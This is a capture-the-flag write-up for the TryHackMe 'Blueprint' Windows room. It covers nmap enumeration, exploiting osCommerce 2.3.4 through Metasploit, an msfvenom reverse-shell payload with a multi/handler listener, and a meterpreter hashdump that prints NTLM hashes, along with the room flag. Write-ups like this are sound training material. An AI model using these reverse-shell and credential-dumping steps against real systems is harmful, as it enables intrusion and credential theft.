TryHackMe Writeup - Blueprint Room

Title	https://tryhackme.com/room/blueprint
Description	Hack into this Windows machine and escalate your privileges to Administrator.
Difficulty	Easy
Maker	https://tryhackme.com/p/MrSeth6797

Nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74


└─$ nmap -sC -sV -oA nmap/blueprint 10.10.28.87
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 12:33 EST
Nmap scan report for 10.10.28.87
Host is up (0.15s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: 404 - File or directory not found.
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_ssl-date: TLS randomness does not represent time
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| tls-alpn:
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp   open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8080/tcp  open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
|_http-title: Index of /
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2019-04-11 22:52  oscommerce-2.3.4/
| -     2019-04-11 22:52  oscommerce-2.3.4/catalog/
| -     2019-04-11 22:52  oscommerce-2.3.4/docs/
|_
| http-methods:
|_  Potentially risky methods: TRACE
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  msrpc        Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 1s, median: 1s
| smb-os-discovery:
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-28T17:35:00+00:00
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:b8:60:4f:ba:87 (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2024-02-28T17:35:00
|_  start_date: 2024-02-28T17:27:12
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

It is using osCommerce 2.3.4 - public exploit is available for this version - https://www.exploit-db.com/exploits/44374

root flag

Instead of using the exploit directly, I used Metasploit framework.

Start by searching the exploit.

Untitled

set options and then run the exploit, and boom, it will give you Metasploit shell.

Untitled

Now as we got the shell, navigate to the administrator desktop and cat the root file.

1
2
3
4


meterpreter > pwd
C:\Users\Administrator\Desktop
meterpreter > cat root.txt.txt
THM{aea1e3ce6fe7f89e10cea833ae009bee}

Hashdump

Now we have php shell, which is useless to get the hashdump. It will give you error when running hashdump in that shell.

1
2


meterpreter > hashdump
[-] The "hashdump" command requires the "priv" extension to be loaded (run: `load priv`)

So what we need to do is escalate php shell into window’s shell. To do so, I have found a blog which seems to bee very helpful - https://dl.packetstormsecurity.net/papers/attack/root3.pdf and https://sckull.github.io/posts/blueprint/

According to the blog, firstly generate the payload using msfvenom -p windows/meterpreter/reverse_tcp lhost=tun0 lport=1338 -f exe > payload.exe

Then move to system folder (cd c:\\windows\\system32) and upload the payload into php shell using upload payload.exe.

Open a new msfconsole and then use the following command to start window's shell.

1
2
3
4
5


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost tun0
set lport 1338
exploit

Now, execute the payload using execute -f payload.exe on php shell and boom, we got the window’s shell.

Untitled

This are the hashes

1
2
3


Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::

Atlast, we can use crackstation website to crack the hash.

Untitled